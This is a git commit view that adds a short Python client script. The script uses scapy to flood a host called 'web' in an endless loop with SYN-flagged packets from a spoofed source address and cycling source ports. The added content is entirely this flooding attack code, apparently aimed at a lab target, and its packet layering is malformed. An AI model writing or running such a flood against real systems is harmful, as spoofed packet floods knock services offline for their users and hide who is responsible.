Saataa andagii !

This commit is contained in:
Lukian 2024-12-26 12:24:05 +01:00
parent a38d84d8fe
commit 282ad8f32e
4 changed files with 11 additions and 13 deletions

8
client/main.py Normal file
View file

@ -0,0 +1,8 @@
from scapy.all import *
while True:
for i in range(512,2048):
pkt = IP(dst='web') / IP(src='192.168.1.69')/ TCP(dport=80,sport=i,flags='S') / ICMP()
send(pkt, loop=1)
print("Sent packet")